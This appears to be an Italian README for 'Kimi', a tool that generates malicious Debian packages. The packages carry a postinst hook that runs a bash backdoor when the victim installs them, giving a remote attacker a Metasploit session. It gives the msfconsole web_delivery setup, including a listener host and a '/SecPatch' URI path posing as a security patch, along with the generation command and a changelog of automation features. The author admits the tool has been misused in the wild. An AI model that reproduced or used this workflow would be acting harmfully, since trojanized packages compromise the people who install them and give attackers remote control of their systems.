
Script per generare pacchetti debian maliziosi (debain trojan).
Script per generare pacchetti debian malevoli (trojan debian).
Kimi è un nome ispirato a "Kimimaro", uno dei miei personaggi preferiti dell'anime chiamato "Naruto".
Kimi è uno script che genera pacchetti debian malevoli per metasploit
che consistono in un file bash. Il file bash viene distribuito nella directory "/usr/local/bin/".
La backdoor viene eseguita appena la vittima tenta di installare il pacchetto deb grazie al file postinst
Il file bash si inietta e agisce anche come un comando di sistema che, quando eseguito dalla vittima,
e l'attaccante lo intercetta con una sessione.
Vantaggi :
-- Completamente indipendente. Significa che l'utente non ha bisogno di installare alcun creatore di pacchetti debian
-- Può essere integrato facilmente con qualsiasi generatore di payload grazie all'uso di argomenti (lame :P lo so)
Kimi dipende fondamentalmente dal modulo web_delivery e tutto è automatizzato.
tutto ciò di cui l'attaccante ha bisogno è di effettuare le seguenti impostazioni:
Impostazione di Web_Delivery in msf :
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
Generazione del payload malevolo :
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386
NOTA :: Questo progetto è stato creato per essere integrato con Venom Shellcode Generator 1.0.13.
Può essere utilizzato anche in modo indipendente; tutto ciò di cui l'utente ha bisogno è di cambiare il uripath nelle variabili di msf
-------------------------------------------------------------------------------------
Testato su :
Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
ParrotOS (Debian Jessie)
Kali Rolling 2.0
[Feb-22-2017]
-- Aggiunta funzione di creazione del file "postinst" per automatizzare l'esecuzione del file malevolo incorporato
-- Aggiunta funzione di generazione del file RC per automatizzare completamente l'apertura dell'handler, quindi non è necessario
impostare l'handler manualmente
-- Corretti alcuni bug comuni [un ringraziamento speciale a r00t 3xp10it :)]
[Oct-12-2017]
-- Aggiunto argomento da riga di comando (-a/--arch) per selezionare l'architettura (i386/amd64)
[April-24-2019] - Versione di test.
-- Ora è possibile impostare URI e LPORT personalizzati
-- Il payload Python è stato aggiornato secondo Python 2/3 e anche l'ultima versione di Metasploit 5.
-- L'intero codice è stato reimplementato, anche se supporta ancora Python 2.7

Post sul blog : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
Video YouTube : https://youtu.be/Dsn6BRHy9_w
Campione Virustotal (perché ho visto un uso scorretto di questo script in natura): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f
Suspicious Shell Activity [Red Team]
Twitter : @bofheaded